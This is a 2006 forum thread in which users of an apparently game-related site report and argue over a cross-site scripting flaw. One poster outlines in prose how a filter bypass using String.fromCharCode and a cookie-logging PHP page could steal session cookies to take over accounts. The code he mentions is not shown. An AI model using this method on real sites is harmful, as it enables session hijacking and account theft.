jeremy02 - Fri Jul 07, 2006 12:20 pm Post subject: Yarold Anyone have any idea where Yarold is, or when he'll be online next? Can someone view the dynasties page in IE and tell me if anything happens? TheNewestJedder - Fri Jul 07, 2006 7:26 pm i noticed it the past two days. every time i visit i get a windows message comes up. jeremy02 - Fri Jul 07, 2006 10:15 pm What does it say? Basically, I could be stealing every user's account on this site who uses IE and views the dynasties page. TheNewestJedder - Sat Jul 08, 2006 12:10 am 
the message right there. jeremy02 - Sat Jul 08, 2006 12:19 am Yup, that's your cookie data. TheNewestJedder - Sat Jul 08, 2006 12:25 am it needs to be fixed now. TheNewestJedder - Sat Jul 08, 2006 12:29 am i tried telling our good friend metaleo but it seems he is just doing nothing but ignoring me when i tried to alert him of a problem. Metalteo - Sat Jul 08, 2006 12:53 am Maybe I don't care. Go ahead jeremy, make my days and do it. Locked. Yarold - Tue Jul 11, 2006 8:03 pm I was moving from warsaw to my home. As for problem. It doesn't look urgent, but as every bug its nice to be fixed. I'll be thankfull if someone can report this to me. Also dont blame Metal for bugs in scripts (wich for i'm more suitable person). Metalteo - Tue Jul 11, 2006 8:41 pm I already did fix part of the problem. The annoying java pop-up is gone at least. It's it minor glitch and harmless, but you're right it's nice if it gets fixed, since some feel the need to play silly games with it' I'll send you a PM in chat to report it. jeremy02 - Wed Jul 12, 2006 2:22 am
Not true. This is the same problem that before allowed me to access 100s of accounts. You think it's safe because you now filter ' and ", but you are forgetting about String.fromCharCode. Yarold - Wed Jul 12, 2006 1:30 pm but you can make only popup with owns data (i think?). jeremy02 - Wed Jul 12, 2006 11:21 pm Yarold, that is why I would make the code like this.
What that does is set the value "c" to the cookie from the site it's redirecting from. Now, you make cookie.php look like this.
So now that you wrote the users cookie to log.htm, you can look at it and replace your own cookie data with theirs, meaning that you will then be logged in as that user. Yarold - Wed Jul 12, 2006 11:40 pm hopefully fixed this one (from 0.72 version cookie data from other ppl is not very usefull) jeremy02 - Thu Jul 13, 2006 12:01 am Well I'd check for you to see if it's still exploitable, but of course Metalteo deleted my dynasty. EDIT: The only time cookie data isn't useful is when you validate the session somehow. |
